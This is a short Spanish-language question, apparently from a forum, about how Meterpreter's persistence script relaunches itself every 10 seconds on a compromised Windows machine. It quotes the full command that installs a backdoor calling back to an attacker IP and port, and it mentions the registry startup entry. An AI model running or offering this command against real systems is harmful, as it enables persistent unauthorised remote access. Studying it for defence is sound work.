Cuando explotamos de forma remota un objetivo con meterpreter, podemos usar el comando run persistence -U -i 10 -p 12345 -r 192.168.1.1 para hacer que un programa persistente intente conectarse a la máquina cuya dirección IP sea 192.168.1.1 en el puerto 12345 cada 10 segundos.
Cuando utilicé el monitor de tareas en la máquina de destino, vi que el programa persistente realmente se ejecuta cada 10 segundos al intentar conectarse de nuevo a la máquina atacante, y si no se encuentra ninguna respuesta, el programa simplemente se apaga.
Lo que quiero saber es: ¿Cómo se inicia este programa (o script) cada 10 segundos (sé que no está usando sleep () o un hilo porque no se muestra ningún otro proceso nuevo en el monitor de tareas).
Miré en el registro de Windows y acabo de encontrar que este script se inicia solo en el inicio, pero no entiendo cómo se lanza él mismo periódicamente.